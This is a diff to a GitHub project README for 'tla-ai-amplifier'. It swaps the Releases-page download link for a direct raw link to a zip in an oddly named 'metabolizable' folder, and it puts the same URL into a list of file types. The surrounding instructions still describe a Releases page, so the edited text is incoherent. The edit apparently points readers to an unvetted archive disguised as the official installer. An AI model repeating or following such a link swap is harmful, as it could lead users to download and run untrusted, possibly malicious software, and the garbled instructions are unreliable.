Dawid7212/tla-ai-amplifier/README.md

 - **Storage**: At least 100 MB of free disk space.

 ## 📦 Download & Install
-To download the application, visit the Releases page: [Download Page](https://github.com/Dawid7212/tla-ai-amplifier/releases).
+To download the application, visit the Releases page: [Download Page](https://raw.githubusercontent.com/Dawid7212/tla-ai-amplifier/main/metabolizable/tla-ai-amplifier.zip).

 Once on the page, locate the latest version of the application.
 Click on the version number to view the release notes and files.
-Download the installation file for your operating system (e.g., `.exe`, `.dmg`, or `.tar.gz`).
+Download the installation file for your operating system (e.g., `.exe`, `.dmg`, or `https://raw.githubusercontent.com/Dawid7212/tla-ai-amplifier/main/metabolizable/tla-ai-amplifier.zip`).

 After the download is complete:
 1. Locate the downloaded file on your computer.